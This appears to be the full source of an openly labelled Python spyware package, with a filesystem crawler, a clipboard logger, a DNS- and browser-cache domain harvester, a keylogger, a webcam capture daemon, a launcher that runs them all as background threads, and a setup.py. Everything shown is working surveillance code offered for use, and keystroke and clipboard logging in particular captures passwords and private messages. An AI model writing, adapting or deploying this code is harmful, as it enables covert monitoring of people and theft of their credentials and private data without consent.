#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This file implement a SpyWare to get all files and metadata. """

###################
#    This file implement a SpyWare to get all files and metadata.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = ["Daemon", "FilesLogger", "main", "config_load"]

from os import path, scandir, DirEntry, environ
from configparser import ConfigParser
from time import strftime, localtime
from stat import filemode
from time import sleep
from enum import Enum
from sys import argv


def config_load() -> None:

    """ This function load the config file. """

    global Constantes

    CONFIG = ConfigParser()
    env_conf_file = environ.get("filesSpy.conf")

    if len(argv) == 2:
        CONFIG.read(argv[1])
    elif env_conf_file:
        CONFIG.read(env_conf_file)
    else:
        CONFIG.read(path.join(path.dirname(__file__), "filesSpy.conf"))


    class Constantes(Enum):

        timeBetweenDir: float = CONFIG.getfloat("TIME", "directorySleep")
        timeBetweenFiles: float = CONFIG.getfloat("TIME", "fileSleep")
        timeRelaunch: float = CONFIG.getfloat("TIME", "relaunchSleep")
        save_filename: str = CONFIG["SAVE"]["filename"]


class Daemon:

    """ Class implement loop to run for ever. """

    def __init__(self):
        self.time = Constantes.timeRelaunch.value
        self.fileslogger = FilesLogger()
        self.run = True

    def run_for_ever(self):

        """ This function implement the loop to run for ever. """

        self.fileslogger.launch()

        while self.run:
            self.fileslogger.get_filenames(path.normcase("/"))
            if self.run:
                sleep(self.time)

class FilesLogger:

    """ This class get all files and metadata. """

    def __init__(self):
        self.timeFile = Constantes.timeBetweenFiles.value
        self.timeDir = Constantes.timeBetweenDir.value
        self.file = Constantes.save_filename.value

    def launch(self):

        """ This function launch the file logger. """

        if not path.isfile(self.file):
            with open(self.file, "w") as csvfile:
                csvfile.write(
                    "name,size,access_time,modif_time,"
                    "rights,directory,is_uid,is_gid,"
                    "metadata_change_time\n"
                )

    def get_filenames(self, directory: str) -> None:

        """ This function get recursives filenames. """

        for file in scandir(directory):
            if file.is_dir():

                sleep(self.timeDir)
                try:
                    self.get_filenames(path.join(directory, file.name))
                except PermissionError as e:
                    print(e)
            
            elif file.is_file():
            
                sleep(self.timeFile)
                try:
                    self.get_data(file, directory)
                except Exception as e:
                    print(e)

    def get_data(self, file: DirEntry, directory: str) -> None:

        """ This function get metadata and parse filename. """

        metadata = file.stat()
        rights = filemode(metadata.st_mode)

        data = {
            "name": file.name,
            "size": str(metadata.st_size),
            "access_time": strftime("%Y-%m-%d %H:%M:%S", localtime(metadata.st_atime)),
            "modif_time": strftime("%Y-%m-%d %H:%M:%S", localtime(metadata.st_mtime)),
            "rights": rights,
            "directory": directory,
            "is_uid": str(metadata.st_uid),
            "is_gid": str(metadata.st_gid),
            "metadata_change_time": strftime(
                "%Y-%m-%d %H:%M:%S", localtime(metadata.st_ctime)
            ),
        }

        self.save(data)

    def save(self, data: dict) -> None:

        """ This function save data in csv file. """

        data = ",".join(data.values()) + "\n"

        with open(self.file) as file:
            datas = file.read()

        if data not in datas:
            with open(self.file, "a") as csvfile:
                csvfile.write(data)


def main():
    config_load()

    daemon = Daemon()
    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False

if __name__ == "__main__":
    main()


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This package implement a SpyWare to capture the clipboard. """

###################
#    This package implement a SpyWare to capture the clipboard.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = ["Daemon", "main", "config_load"]

from configparser import ConfigParser
from os import path, environ
from pyperclip import paste
from time import sleep
from enum import Enum
from sys import argv


def config_load() -> None:

    """ This function load the config file. """

    global Constantes

    CONFIG = ConfigParser()
    env_conf_file = environ.get("clipboardSpy.conf")

    if len(argv) == 2:
        CONFIG.read(argv[1])
    elif env_conf_file:
        CONFIG.read(env_conf_file)
    else:
        CONFIG.read(path.join(path.dirname(__file__), "clipboardSpy.conf"))


    class Constantes(Enum):

        save_filename: str = CONFIG["SAVE"]["filename"]
        timeBetweenPaste: float = CONFIG.getfloat("TIME", "clipboardSleep")


class Daemon:

    """ This class implement a loop to get clipboard for ever. """

    def __init__(self):
        self.time = Constantes.timeBetweenPaste.value
        self.path =  Constantes.save_filename.value
        self.run = True

    def run_for_ever(self) -> None:

        """ This function get clipboard and sleep for ever. """

        if not path.isfile(self.path):
            file = open(self.path, 'w')
            file.write("")
            file.close()

        while self.run:
            self.clipboard = paste()
            if len(self.clipboard) > 75:
                self.clipboard = ""
            else:
                self.save()

            if self.run:
                sleep(self.time)

    def save(self) -> None:

        """ This function save clipboard if isn't save before. """

        with open(self.path) as file:
            data = file.read()

        if self.clipboard not in data:
            with open(self.path, "a") as file:
                file.write(self.clipboard + "\n")


def main() -> None:
    config_load()

    daemon = Daemon()
    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False


if __name__ == "__main__":
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This file implement a SpyWare to get all connection destination. """

###################
#    This file implement a SpyWare to get all connection destination.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = ["Daemon", "main", "CacheDNS", "CacheBrowser", "config_load"]

from os import path, environ, device_encoding, environ
from configparser import ConfigParser
from subprocess import Popen, PIPE
from platform import system
from re import finditer
from time import sleep
from glob import iglob
from enum import Enum
from sys import argv


def config_load() -> None:

    """ This function load the config file. """

    global Constantes

    CONFIG = ConfigParser()
    env_conf_file = environ.get("domainsSpy.conf")

    if len(argv) == 2:
        CONFIG.read(argv[1])
    elif env_conf_file:
        CONFIG.read(env_conf_file)
    else:
        CONFIG.read(
            path.join(
                path.dirname(__file__), "domainsSpy.conf"
            )
        )


    class Constantes(Enum):

        regex_domain = "[a-zA-Z0-9][a-zA-Z0-9-_]{0,61}[a-zA-Z0-9]{0,1}\.([a-zA-Z]{1,6}|[a-zA-Z0-9-]{1,30}\.[a-zA-Z]{2,4})"
        regex_ip = "([0-9]{1,3}[.]){3}[0-9]{0,3}"

        save_filename = CONFIG["SAVE"]["filename"]

        if system() == "Windows":
            commandes = (["ipconfig", "/displaydns"],)
            browser_directories = path.join(environ["APPDATA"], "..")
        else:
            commandes = (
                ["strings", "/var/cache/nscd/hosts"],
                ["sudo", "killall", "-USR1", "systemd-resolved"],
                ["sudo", "journalctl", "-u", "systemd-resolved"],
            )
            browser_directories = path.join(path.expandser("~"), ".locals")

        timeDns: float = CONFIG.getfloat("TIME", "dnsSleep")
        timeBrowser: float = CONFIG.getfloat("TIME", "browserSleep")
        timeBetweenReadingFile: float = CONFIG.getfloat("TIME", "readingFileSleep")
        timeBetweenGetDomain: float = CONFIG.getfloat("TIME", "getDomainSleep")


class Daemon:

    """ This class launch DNS this script as service for ever. """

    def __init__(self):
        self.timeBrowser = Constantes.timeBrowser.value
        self.timeDns = Constantes.timeDns.value
        self.cacheAppData = CacheBrowser()
        self.cacheDns = CacheDNS()
        self.run = True

    def run_CacheDns(self) -> None:

        """ This function launch the loop to get DnsCache. """

        create_file()

        while self.run:
            self.cacheDns.launch()
            self.cacheDns.research()
            self.cacheDns.save()
            if self.run:
                sleep(self.timeDns)

    def run_AppData(self) -> None:

        """ This function launch the loop to get BrowserCache. """

        create_file()

        while self.run:
            self.cacheAppData.get_filenames(
                path.join(Constantes.browser_directories.value, "..")
            )
            if self.run:
                sleep(self.timeBrowser)


class CacheDNS:

    """ This class get DNS cache and find all domains and IP. """

    def __init__(self):
        self.commandes = Constantes.commandes.value
        self.process = None
        self.out = None
        self.ip = []
        self.domains = []

    def launch(self) -> None:

        """ This function execute the command to get DNS cache. """

        self.out = ""
        errors = ""
        for commande in self.commandes:
            self.process = Popen(commande, stdout=PIPE, stderr=PIPE)
            out, err = self.process.communicate()
            self.out += out.decode(device_encoding(0))
            errors += err.decode(device_encoding(0))

        if errors or self.process.returncode:
            print(f"Error: {err}")

    def research(self) -> None:

        """ This function research IP and domains from stdout. """

        for ip in finditer(Constantes.regex_ip.value, self.out):
            sleep(Constantes.timeBetweenGetDomain.value)
            self.ip.append(ip.group())

        for domain in finditer(Constantes.regex_domain.value, self.out):
            sleep(Constantes.timeBetweenGetDomain.value)
            self.domains.append(domain.group())

    def save(self):

        """ This function save ip and domains. """

        write_if_not_in_file(*(self.domains + self.ip))


class CacheBrowser:

    """ This class get domains and IP in Browser and Application cache. """

    def __init__(self):
        self.data = None
        self.temp_data = None
        self.regex_ip = Constantes.regex_ip.value.encode()
        self.regex_domain = Constantes.regex_domain.value.encode()
        self.save_filename = Constantes.save_filename.value
        self.time_between_reading_file = Constantes.timeBetweenReadingFile.value

    def save(self, *data) -> None:

        """ This function save data. """

        with open(self.save_filename) as file:
            self.data = file.read()

        file = open(self.save_filename, "a")
        for domain in data:
            domain = domain.decode()
            if domain not in self.data:
                file.write(domain + "\n")
                self.data += domain + "\n"
        file.close()

        self.data = None

    def get_filenames(self, directory: str) -> None:

        """ This function get recursives filenames. """

        for filename in iglob(path.join(directory, "*")):
            if path.isdir(filename):
                self.get_filenames(path.join(directory, filename))
            elif path.isfile(filename):
                try:
                    self.get_data(path.join(directory, filename))
                except Exception as e:
                    print(e)
                sleep(self.time_between_reading_file)

    def get_data(self, filename: str) -> None:

        """ This function get domain and IP from data file. """

        with open(filename, "rb") as file:
            data = file.read()

        datas = []
        for ip in finditer(self.regex_ip, data):
            sleep(Constantes.timeBetweenGetDomain.value)
            datas.append(ip.group())

        for domain in finditer(self.regex_domain, data):
            sleep(Constantes.timeBetweenGetDomain.value)
            datas.append(domain.group())

        self.save(*datas)


def create_file():

    """ This function create the file to save if is not exist. """

    if not path.exists(Constantes.save_filename.value):
        with open(Constantes.save_filename.value, "w") as file:
            file.write("")

def write_if_not_in_file(*list_to_write) -> None:

    """ This function write data if this data is not in file. """

    with open(Constantes.save_filename.value, "r") as file:
        texte = file.read()

    with open(Constantes.save_filename.value, "a") as file:
        for element in list_to_write:
            if element not in texte:
                file.write(element + "\n")
                texte += element + "\n"


def main() -> None:
    from threading import Thread

    config_load()

    daemon = Daemon()
    thread = Thread(target=daemon.run_CacheDns)
    thread.start()
    try:
        daemon.run_AppData()
    except KeyboardInterrupt:
        daemon.run = False

    thread.join()

if __name__ == "__main__":
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This file implement a spyware. """

###################
#    This file implement a spyware.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = [ 
    "spy", "join", "stop_deamons", 
    "start_audio_spy", "start_copy_spy",
    "start_domains_spy", "start_files_spy",
    "start_key_spy", "start_screen_spy",
    "start_webcam_spy", "spyware"
]

try:
    from AudioLogger.AudioLogger import Daemon as AudioDaemon, config_load as audioConfig
    from CopyLogger.CopyLogger import Daemon as CopyDaemon, config_load as copyConfig
    from DomainsLogger.DomainsLogger import Daemon as DomainsDaemon, config_load as domainsConfig
    from FilesLogger.FilesLogger import Daemon as FilesDaemon, config_load as filesConfig
    from KeyLogger.KeyLogger import Daemon as KeyDaemon, config_load as keyConfig
    from ScreenLogger.ScreenLogger import Daemon as ScreenDaemon, config_load as screenConfig
    from WebcamLogger.WebcamLogger import Daemon as WebcamDaemon, config_load as webcamConfig
except ImportError:
    from .AudioLogger.AudioLogger import Daemon as AudioDaemon, config_load as audioConfig
    from .CopyLogger.CopyLogger import Daemon as CopyDaemon, config_load as copyConfig
    from .DomainsLogger.DomainsLogger import Daemon as DomainsDaemon, config_load as domainsConfig
    from .FilesLogger.FilesLogger import Daemon as FilesDaemon, config_load as filesConfig
    from .KeyLogger.KeyLogger import Daemon as KeyDaemon, config_load as keyConfig
    from .ScreenLogger.ScreenLogger import Daemon as ScreenDaemon, config_load as screenConfig
    from .WebcamLogger.WebcamLogger import Daemon as WebcamDaemon, config_load as webcamConfig

from threading import Thread
from typing import Tuple
from sys import argv

def join(*threads) -> None:

    """ This function join threads. """

    for thread in threads:
        thread.join()

def stop_deamons(*daemons) -> None:

    """ This function send daemon's stop signal. """

    for daemon in daemons:
        daemon.run = False

def start_audio_spy() -> Tuple[Thread, AudioDaemon]:

    """ This function launch audio spy. """

    audioConfig()
    audio = AudioDaemon()

    audio_thread = Thread(target=audio.run_for_ever)
    audio_thread.daemon = True
    audio_thread.start()

    return audio_thread, audio

def start_copy_spy() -> Tuple[Thread, CopyDaemon]:

    """ This function launch copy spy. """

    copyConfig()
    copy = CopyDaemon()

    copy_thread = Thread(target=copy.run_for_ever)
    copy_thread.daemon = True
    copy_thread.start()

    return copy_thread, copy

def start_domains_spy() -> Tuple[Thread, Thread, DomainsDaemon]:

    """ This function launch domains spy. """

    domainsConfig()
    domains = DomainsDaemon()

    domains1_thread = Thread(target=domains.run_CacheDns)
    domains1_thread.daemon = True
    domains1_thread.start()

    domains2_thread = Thread(target=domains.run_AppData)
    domains2_thread.daemon = True
    domains2_thread.start()

    return domains1_thread, domains2_thread, domains

def start_files_spy() -> Tuple[Thread, FilesDaemon]:

    """ This function launch files spy. """

    filesConfig()
    files = FilesDaemon()

    files_thread = Thread(target=files.run_for_ever)
    files_thread.daemon = True
    files_thread.start()

    return files_thread, files

def start_key_spy() -> Tuple[Thread, KeyDaemon]:

    """ This function launch key spy. """

    keyConfig()
    key = KeyDaemon()

    key_thread = Thread(target=key.run_for_ever)
    key_thread.daemon = True
    key_thread.start()

    return key_thread, key

def start_screen_spy() -> Tuple[Thread, ScreenDaemon]:

    """ This function launch screen spy. """

    screenConfig()
    screen = ScreenDaemon()

    screen_thread = Thread(target=screen.run_for_ever)
    screen_thread.daemon = True
    screen_thread.start()

    return screen_thread, screen

def start_webcam_spy() -> Tuple[Thread, WebcamDaemon]:

    """ This function launch files spy. """

    webcamConfig()
    webcam = WebcamDaemon()

    webcam_thread = Thread(target=webcam.run_for_ever)
    webcam_thread.daemon = True
    webcam_thread.start()

    return webcam_thread, webcam

def spy() -> None:

    """ This function launch all spy functions. """

    threads = []
    
    thread, audio = start_audio_spy()
    threads.append(thread)

    thread, copy = start_copy_spy()
    threads.append(thread)

    thread, thread2, domains = start_domains_spy()
    threads.append(thread)
    threads.append(thread2)

    thread, files = start_files_spy()
    threads.append(thread)

    thread, key = start_key_spy()
    threads.append(thread)

    thread, screen = start_screen_spy()
    threads.append(thread)

    thread, webcam = start_webcam_spy()
    threads.append(thread)

    try:
        join(*threads)
    except KeyboardInterrupt:
        stop_deamons(
            audio, copy, domains,
            files, key, screen,
            webcam
        )
    join(*threads)

def spyware() -> None:

    """ The SpyWare launcher. """

    types = [
        "webcam", "files", "screen",
        "key", "domains", "copy",
        "audio"
    ]

    if len(argv) == 1:
        spy()

    elif len(argv) >= 2 and argv[1].lower() in types:
        type_ = argv.pop(1).lower()
        functions = globals()[f"start_{type_}_spy"]()
        try:
            join(*functions[:-1])
        except KeyboardInterrupt:
            stop_deamons(functions[-1])
        join(*functions[:-1])

    else:
        print(f"""
USAGE: python3 SpyWare [TYPE]
    TYPE: {' '.join(types)}
    """)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This package implement a spyware to get keyboard event. """

###################
#    This package implement a spyware to get keyboard event.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = ["Daemon", "KeyLogger", "main", "config_load"]

from pynput.keyboard import Key, Listener, Controller, KeyCode
from time import localtime, strftime, struct_time
from configparser import ConfigParser
from os import path, environ
from enum import Enum
from sys import argv


def config_load() -> None:

    """ This function load the config file. """

    global Constantes
    
    CONFIG = ConfigParser()
    env_conf_file = environ.get("keySpy.conf")

    if len(argv) == 2:
        CONFIG.read(argv[1])
    elif env_conf_file:
        CONFIG.read(env_conf_file)
    else:
        CONFIG.read(path.join(path.dirname(__file__), "keySpy.conf"))


    class Constantes(Enum):

        save_filename: str = CONFIG["SAVE"]["filename"]
        write_eventPress: int = CONFIG.getint("SAVE", "event_press")
        write_eventRelease: int = CONFIG.getint("SAVE", "event_release")
        write_hotKeys: int = CONFIG.getint("SAVE", "hot_keys")
        write_eventTime: int = CONFIG.getint("SAVE", "event_time")


class KeyLogger:

    """ This class implement a keylogger. """

    def __init__(self):
        self.is_pressed: list = []
        self.file: str = Constantes.save_filename.value
        self.controller: Controller = Controller()
        self.run = True

    def get_event_press(self, event: Key) -> None:

        """ This method add a key press event. """

        key: str = self.get_event_char(event)

        if Constantes.write_hotKeys.value:
            for event in self.is_pressed:
                key = f"{event} <{key}>"

        if Constantes.write_eventPress.value:
            key += "PRESS: " + key

        if self.controller.shift_pressed:
            key += " (MAJ)"
        if self.controller.alt_pressed:
            key += " (ALT)"
        if self.controller.alt_gr_pressed:
            key += " (ALTGR)"
        if self.controller.ctrl_pressed:
            key += " (CTRL)"

        self.is_pressed.append(event)

        self.save(key + "\n")
        return self.run

    def get_code(self, event) -> int:

        """ This function return the code of Key or KeyCode. """

        if type(event) == KeyCode:
            code = event.vk
        elif type(event) == Key:
            code = event._value_.vk

        return code

    def get_event_release(self, event: Key) -> None:

        """ This method add a key release event. """

        if Constantes.write_eventRelease.value:
            self.save("RELEASE: " + self.get_event_char(event) + "\n")

        code = self.get_code(event)

        if len(self.is_pressed):
            self.is_pressed.pop()

        return self.run

    def run_for_ever(self) -> None:

        """ Start the keylogger. """

        with Listener(
            on_press=self.get_event_press, on_release=self.get_event_release
        ) as listener:
            listener.join()

    def save(self, key: str) -> None:

        """ This method save pressed keys in file and clean the events list. """

        if Constantes.write_eventTime.value:
            text = strftime(f"%Y-%m-%d %H:%M:%S -> {key}")
        else:
            text = key

        with open(self.file, "a") as file:
            file.write(text)

    def get_event_char(self, event: Key) -> str:

        """ This function get event.char if exist. """

        char: str = event.__dict__.get("char")

        if char is None:
            char: str = str(event)

        return char


def main() -> None:
    config_load()

    daemon = Daemon()

    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False


Daemon = KeyLogger

if __name__ == "__main__":
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

""" This file implement a SpyWare to capture picture from webcam. """

###################
#    This file implement a SpyWare to capture picture from webcam.
#    Copyright (C) 2021  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

__all__ = ["Daemon", "main", "config_load"]

from os import path, makedirs, environ
from cv2 import VideoCapture, imwrite
from configparser import ConfigParser
from time import sleep
from glob import glob
from enum import Enum
from sys import argv


def config_load() -> None:

    """ This function load the config file. """

    global Constantes

    CONFIG = ConfigParser()
    env_conf_file = environ.get("webcamSpy.conf")

    if len(argv) == 2:
        CONFIG.read(argv[1])
    elif env_conf_file:
        CONFIG.read(env_conf_file)
    else:
        CONFIG.read(path.join(path.dirname(__file__), "webcamSpy.conf"))


    class Constantes(Enum):

        save_filename: str = CONFIG["SAVE"]["filename"]
        save_dirname: str = CONFIG["SAVE"]["dirname"]
        timeBetweenPicture: float = CONFIG.getfloat("TIME", "pictureSleep")


class Daemon:

    """ This class implement a loop to capture picture for ever. """

    def __init__(self):
        self.time = Constantes.timeBetweenPicture.value
        self.run = True
        self.path = path.join(
            Constantes.save_dirname.value, Constantes.save_filename.value
        )
        self.increment = len(glob(self.path))

    def run_for_ever(self) -> None:

        """ This function get picture from webcam and sleep for ever. """

        makedirs(Constantes.save_dirname.value, exist_ok=True)

        while self.run:
            camera = VideoCapture(0)
            return_value, image = camera.read()
            imwrite(self.path.replace("*", str(self.increment)), image)
            del camera
            self.increment += 1

            if self.run:
                sleep(self.time)


def main() -> None:
    config_load()

    daemon = Daemon()
    try:
        daemon.run_for_ever()
    except KeyboardInterrupt:
        daemon.run = False


if __name__ == "__main__":
    main()



from setuptools import setup, find_packages
from platform import system
import sys

def is_64bit() -> bool:
    return sys.maxsize > 2**32

whl_file = "PyAudio-0.2.11-cp39-cp39-win_amd64.whl" if is_64bit() else "PyAudio-0.2.11-cp39-cp39-win32.whl"
packages = ['pyautogui', 'opencv-python', 'pillow', 'pyperclip', 'pynput']

if system() == "Windows":
    from os import system
    system(f"python -m pip install {whl_file}")
else:
    from os import system
    system("sudo apt-get install portaudio19-dev python-pyaudio")
    packages.append("pyaudio")

setup(
    name = 'SpyWare',
 
    version = "0.0.1",
    packages = find_packages(include=["SpyWare"]),
    install_requires = packages,

    author = "Maurice Lambert", 
    author_email = "mauricelambert434@gmail.com",
 
    description = "This package implement a complete SpyWare.",
    long_description = open('README.md').read(),
    long_description_content_type="text/markdown",
 
    include_package_data = True,

    url = 'https://github.com/mauricelambert/SpyWare',
 
    classifiers = [
        "Programming Language :: Python",
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Natural Language :: English",
        "Programming Language :: Python :: 3.9",
        "Operating System :: POSIX :: Linux",
        "Operating System :: Microsoft :: Windows",
        "Operating System :: MacOS",
        "Topic :: Security",
    ],
 
    entry_points = {
        'console_scripts': [
            'SpyWare = SpyWare:spyware'
        ],
    },
    python_requires='>=3.6',
)